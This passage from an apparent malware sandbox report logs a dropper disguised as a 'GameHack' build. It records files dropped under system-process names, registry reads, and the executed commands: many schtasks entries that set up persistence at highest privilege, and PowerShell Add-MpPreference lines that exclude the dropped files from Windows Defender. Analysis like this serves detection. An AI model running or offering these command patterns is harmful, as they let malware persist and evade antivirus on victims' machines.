| File created | C:\Program Files\Uninstall Information\MSBuild.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\audiodg.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\dwm.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\System.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\27d1bcfc3c54e0 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Windows\de-DE\conhost.exe.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\de-DE\8e5032cd3c8691 | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\security\templates\audiodg.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\security\templates\42af1c969fbb7b | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\Offline Web Pages\conhost.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Windows\Offline Web Pages\088424020bedd6 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe
"C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {066F2BB1-C4A8-49BB-B79F-115FB55365A8} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
"C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ioi08Taqru.bat"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gxqun3yq\gxqun3yq.cmdline"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES736B.tmp" "c:\Program Files\Windows Photo Viewer\en-US\CSC26E9B39D213245928B931B4D3D3897.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vyynnwny\vyynnwny.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\CSCC87458AC71914A5D9817B7C12DDC47EA.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1gnpojgr\1gnpojgr.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7494.tmp" "c:\Windows\System32\CSC8AF8654FC13D48D0A5FAAA4B8D729FE.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containerRuntimec" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Documents\containerRuntime.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containerRuntime" /sc ONLOGON /tr "'C:\Users\Public\Documents\containerRuntime.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containerRuntimec" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Documents\containerRuntime.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Users\Default\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\Default\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Users\Default\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvc" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\containerRuntime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MErU4jTVhT.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Photo Viewer\en-US\conhost.exe
"C:\Program Files\Windows Photo Viewer\en-US\conhost.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\System.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\System.exe"
C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe
"C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\conhost.exe.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exe" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSBuildM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\MSBuild.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSBuild" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\MSBuild.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSBuildM" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\MSBuild.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Photo Viewer\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Photo Viewer\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Favorites\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Favorites\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Favorites\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 7 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 8 /tr "'C:\Windows\de-DE\conhost.exe.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exe" /sc ONLOGON /tr "'C:\Windows\de-DE\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 10 /tr "'C:\Windows\de-DE\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Windows\security\templates\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\security\templates\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Windows\security\templates\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Java\jre7\lib\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Java\jre7\lib\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files\Java\jre7\lib\dwm.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\conhost.exe.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\MSBuild.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Favorites\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\conhost.exe.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\templates\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
